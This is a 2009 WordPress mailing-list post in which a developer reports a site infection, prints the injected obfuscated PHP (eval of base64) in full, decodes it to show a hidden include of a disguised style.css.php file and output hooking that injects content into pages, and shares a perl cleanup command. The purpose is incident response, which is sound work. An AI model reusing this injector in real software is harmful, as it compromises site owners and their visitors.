[wp-hackers] Weird PHP Injection

Lew Ayotte - Full Throttle Development lew at fullthrottledevelopment.com
Thu Oct 29 19:45:46 UTC 2009 

I'm not sure if anyone has seen this before... except for this guy:
http://wordpress.org/support/topic/320918?replies=8

But I just ran into an issue with a client using WP2.8.4. It seems like
every single file in WP (including themes and plugins) had this injected at
the top:

<?
/**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvdmFyL3d3dy9odG1sL3dwLWNvbnRlbnQvcGx1Z2lucy93cC1waHBteWFkbWluL3BocG15YWRtaW4vcG1kL3N0eWxlcy9kZWZhdWx0L2ltYWdlcy9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL3Zhci93d3cvaHRtbC93cC1jb250ZW50L3BsdWdpbnMvd3AtcGhwbXlhZG1pbi9waHBteWFkbWluL3BtZC9zdHlsZXMvZGVmYXVsdC9pbWFnZXMvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgpeyRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkI9b3JkKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDMsMSkpOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9MTA7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0wO2lmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImNCl7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT11bnBhY2soJ3YnLHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDEwLDIpKTskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPSRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzFbMV07JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9MiskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjgpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMTYpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9Mjt9JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz1nemluZmxhdGUoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkpO2lmKCRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9PT1GQUxTRSl7JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz0kUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4O31yZXR1cm4gJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mzt9fWZ1bmN0aW9uIGRnb2JoKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0Ype0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA9Z3pkZWNvZGUoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRik7aWYocHJlZ19tYXRjaCgnL1w8Ym9keS9zaScsJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCkpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApO31lbHNle3JldHVybiBnbWwoKS4kUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19'));
?>


Which I decoded and prettied up for everyone:

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])) {
    $GLOBALS['sh_no'] = 1;

if(file_exists('/var/www/html/wp-content/plugins/wp-phpmyadmin/phpmyadmin/pmd/styles/default/images/style.css.php'))
{

include_once('/var/www/html/wp-content/plugins/wp-phpmyadmin/phpmyadmin/pmd/styles/default/images/style.css.php');

        if(function_exists('gml')&&!function_exists('dgobh')) {

            if(!function_exists('gzdecode')) {

                function gzdecode($R20FD65E9C7406034FADC682F06732868) {

                    $R6B6E98CDE8B33087A33E4D3A497BD86B =
ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));
                    $R60169CD1C47B7A7A85AB44F884635E41 = 10;
                    $R0D54236DA20594EC13FC81B209733931 = 0;

                    if($R6B6E98CDE8B33087A33E4D3A497BD86B&4) {
                        $R0D54236DA20594EC13FC81B209733931 =
unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));
                        $R0D54236DA20594EC13FC81B209733931 =
$R0D54236DA20594EC13FC81B209733931[1];
                        $R60169CD1C47B7A7A85AB44F884635E41+ =
2+$R0D54236DA20594EC13FC81B209733931;
                    }

                    if($R6B6E98CDE8B33087A33E4D3A497BD86B&8) {
                        $R60169CD1C47B7A7A85AB44F884635E41 =
strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
                    }
                    if($R6B6E98CDE8B33087A33E4D3A497BD86B&16) {
                        $R60169CD1C47B7A7A85AB44F884635E41 =
strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
                    }
                    if($R6B6E98CDE8B33087A33E4D3A497BD86B&2) {
                        $R60169CD1C47B7A7A85AB44F884635E41+ = 2;
                    }
                        $RC4A5B5E310ED4C323E04D72AFAE39F53 =
gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));

                    if($RC4A5B5E310ED4C323E04D72AFAE39F53 =  =  = FALSE) {
                        $RC4A5B5E310ED4C323E04D72AFAE39F53 =
$R20FD65E9C7406034FADC682F06732868;
                    }

                    return $RC4A5B5E310ED4C323E04D72AFAE39F53;
                }
            }

            function dgobh($RDA3E61414E50AEE968132F03D265E0CF) {

                Header('Content-Encoding: none');
                $R3E33E017CD76B9B7E6C7364FB91E2E90 =
gzdecode($RDA3E61414E50AEE968132F03D265E0CF);


if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)) {
                    return
preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);
                } else {
                    return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;
                }
            }

            ob_start('dgobh');
        }
    }
}

I have no idea what it does and I'm not sure if the WP-phpMyAdmin plugin had
a security hole or why it's part of this code. But I deactivated it on the
client's site.

To clean it up:
I first tried just upgrading him to WP2.8.5, but as soon as I visited the
site, it re-injected all the files with that crap. So I ran this script to
remove it from all files:

find . -name '*.php' | xargs perl -pi -e "s#\<\?
/\*\*/eval\(base64_decode\('.+'\)\); \?\>##g"

Then, for good measure I re-copied all the WP2.8.5 files back over. It seems
to have fixed it for the client.

Also, for what it's worth, these are all the plugins that he had
activated...

    AddThis Social Bookmarking Widget
    Advanced Excerpt
    Akismet
    Dagon Design Form Mailer
    Event Calendar
    Lightbox 2
    NextGEN Gallery
    Search & Replace
    SEO Title Tag
    Similarity
    SimplePie Core
    SimplePie Plugin for WordPress
    Theme Switcher
    Twitter Tools
    Viper's Video Quicktags
    WP-phpMyAdmin
    wp-Table
    WP-Table Reloaded
    WPtouch iPhone Theme

I'm still digging to see if I can figure out where the actual hole was. Any
ideas?

Lew Ayotte
Full Throttle Development, LLC
706.363.0688
478.246.4627
lew at fullthrottledevelopment.com
http://fullthrottledevelopment.com
http://twitter.com/full_throttle
http://twitter.com/lewayotte

More information about the wp-hackers mailing list